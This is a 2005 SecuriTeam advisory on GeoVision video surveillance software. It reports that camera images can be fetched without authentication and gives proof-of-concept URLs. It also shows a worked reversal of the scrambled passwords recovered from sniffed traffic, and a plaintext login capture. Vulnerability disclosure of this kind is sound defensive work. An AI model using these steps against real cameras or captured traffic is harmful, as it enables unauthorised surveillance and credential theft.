[NT] GeoVision Digital Video Surveillance System Multiple Privilege Escalation

From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/05

  • Next message: SecuriTeam: "[EXPL] MySQL MaxDB Webtool "GET" Buffer Overflow (Exploit)" 
    To: list@securiteam.com
Date: 11 May 2005 15:17:59 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      GeoVision Digital Video Surveillance System Multiple Privilege Escalation
    ------------------------------------------------------------------------

    SUMMARY

    "The <http://www.geovision.com.tw/> GeoVision Digital Video Surveillance
    System is a PCI card based digital video surveillance range for Microsoft
    Windows platforms. The GeoVision system is expandable to support POS,
    Central Monitoring Station and License Plate Recognition Systems. The
    GeoVision system is in use in commercial and residential installations
    worldwide."

    Multiple issues have been found in GeoVision Digital Video Surveillance
    System, these vulnerabilities revolve around poor authentication
    mechanisms. These issues allow sniffed authentication credentials to be
    reused as-is or unscrambled to allow the discovery of the original
    password. In certain configurations still pictures from security cameras
    can be viewed without providing any authentication.

    DETAILS

    Vulnerable Systems:
     * GeoVision Digital Video Surveillance System version 7.0 and prior

    Privilege Escalation 1:
    When the GeoVision software is set to create JPEG images for use via the
    JPEG Image Viewer it can be seen that no authentication is required to
    view the JPEG images.

    Using GeoVisions own demonstration as an example the following URLs can be
    used to access images. This is true even for servers who specify that a
    username and password is required for authentication. In the current
    GeoVision demonstration only a username is required to access footage.
    This method works on GeoVision systems which are configured to create JPEG
    images. It will also work on GeoVision systems which are not configured
    with the 'Enhanced Network Security' feature. This is understood to be the
    default setting.

    Proof of Concept:
    http://webcam.geovision.com.tw/cam0.jpg
    ..
    http://webcam.geovision.com.tw/cam3.jpg

    Privilege Escalation 2:
    During the authentication phase using the live playback client it was seen
    that the username part of the authentication component is passed in plain
    text. In this partial dump taken using tcpflow the username is seen to be
    'gvUser'.

    Network dump of an authentication attempt:
    --------------------- Network traffic sniffer ---------------------
    192.168.105.136:01187-192.168.105.130:00514: ....
    192.168.105.130:04550-192.168.105.136:01186: RDY.
    192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
    192.168.105.130:04550-192.168.105.136:01186: ...
    192.168.105.136:01186-192.168.105.130:04550: 2.
    -------------------------------------------------------------------

    A simple transformation of the password based on hex values for ASCII
    characters is used to scramble the password. This scrambling is simple to
    do in reverse, as seen in the example below.

    Sniff from network:
    --------------------- Network traffic sniffer ---------------------
    192.168.105.130:04550-192.168.105.136:01186: RDY.
    192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
    192.168.105.130:04550-192.168.105.136:01186: ...
    -------------------------------------------------------------------

    Here we see the username 'gvUser', still in plain text and the scrambled
    password '7d6a6666636e'. In order to go to the from the scrambled string
    to the original password a few simple steps are performed.

    Split the string into pairs of hex strings:
    0x7d
    0x6a
    0x66
    0x66
    0x63
    0x6e

    Each pair represents one character in the original password, so this
    scrambled string is for a password of 6 characters.

    Iterate through the pairs subtracting a number from each pair starting
    with 0x6, for the first character as there are 6 characters in this
    password.

    0x7d - 0x6 = 77
    0x6a - 0x5 = 65
    0x66 - 0x4 = 62
    0x66 - 0x3 = 63
    0x63 - 0x2 = 61
    0x6e - 0x1 = 6d

    Then use an ASCII table to translate into characters

    0x77 = w
    0x65 = e
    0x62 = b
    0x63 = c
    0x61 = a
    0x6d = m

    So the original password was 'webcam'.

    This issue is encountered for all the authentication options below:
    Mpeg4 Encoder Viewer
    56kMpegView0.htm
    LanMpegView0.htm
    MultiView.htm

    Remote Play Back
    PlayBackX.htm

    Emap
    Emap.htm

    For the JPEG Image Viewer (JPGLogin.htm) the authentication credentials
    are passed using the HTTP POST method completely in plain text. Scrambling
    is not used - see below.

    --------------------- Network traffic sniffer ---------------------
    192.168.105.130:34707-192.168.105.136:80 POST /password HTTP/1.1
    Accept: image/gif, image/jpeg, image/pjpeg, */*
    Referer: http://192.168.105.136/JPGLogin.htm
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: 192.168.1.5
    Content-Length: 37
    Connection: Keep-Alive
    Cache-Control: no-cache

    id=gvUser&pwd=webcam&send=Submit
    -------------------------------------------------------------------

    Here the id= value is the username and the pwd= value is the password.

    Vendor Status:
    The vendor has added in version 7.0 a section known as 'Enhanced Network
    Security' that suppose to help in fixing this issue, but this option is
    not set by default.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:tirath@esqo.com> Tirath Rai

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] MySQL MaxDB Webtool "GET" Buffer Overflow (Exploit)"

    Relevant Pages

    • Solaris Security Summary
      ... Administering Security on the Solaris OE ... Configuration control, facility management, and system ... Authentication: The ability to prove who you are. ...
      (comp.unix.solaris)
    • Re: Enabling telnet, ftp, pop3 for root...
      ... Where did I say ANYTHING about not using authentication. ... You're presenting it like direct root login would be a total security ... DON'T have access to the port. ...
      (alt.os.linux)
    • Re: Enabling telnet, ftp, pop3 for root...
      ... Where did I say ANYTHING about not using authentication. ... You're presenting it like direct root login would be a total security ... The ssh account is only used for remote login. ... secret to get to your SSH port is as easy as sniffing. ...
      (alt.os.linux)
    • Re: Spoofing an IP over the internet
      ... The secure authentication script will support many levels of security, ... in case a hacker cost me very much bandwith what is my ...
      (Security-Basics)
    • Re: passwords
      ... different security domain ... by a public key (that has been registered in lieu of a shared-secret ... both originate as well as validate an authentication ... ... public key can't be used to originate an authentication ... ...
      (alt.computer.security)